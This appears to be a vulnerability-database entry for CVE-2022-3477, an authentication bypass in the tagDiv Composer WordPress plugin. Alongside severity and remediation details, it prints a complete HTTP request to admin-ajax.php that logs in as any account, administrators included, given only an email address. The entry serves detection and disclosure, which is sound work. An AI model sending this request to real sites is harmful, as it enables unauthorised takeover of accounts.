| Title | WordPress tagDiv Composer < 3.5 - Authentication Bypass |
|---|---|
| Author | melmathari |
| Severity | Critical |
| Impact | Unauthenticated attackers who know a user's email address can bypass authentication through the Facebook login feature to gain complete access to any user account including administrator accounts on WordPress sites using tagDiv Composer. |
| Remediation | Fixed in 3.5 |
| CVSS Score | 9.8 |
| EPSS Score | 0.55323 |
| CVE ID | CVE-2022-3477 |
| CWE ID | CWE-287 |
| Tags | cve cve2022 wordpress wp-plugin wpscan wp auth-bypass tagdiv vkev vuln |
The tagDiv Composer WordPress plugin before 3.5, required by the Newspaper WordPress theme before 12.1 and Newsmag WordPress theme before 5.2.2, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Connection: close
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=td_ajax_fb_login_user&user[email]=wdNxEU@EBSHy.com
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3477.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-3477.pcap
N/AN/A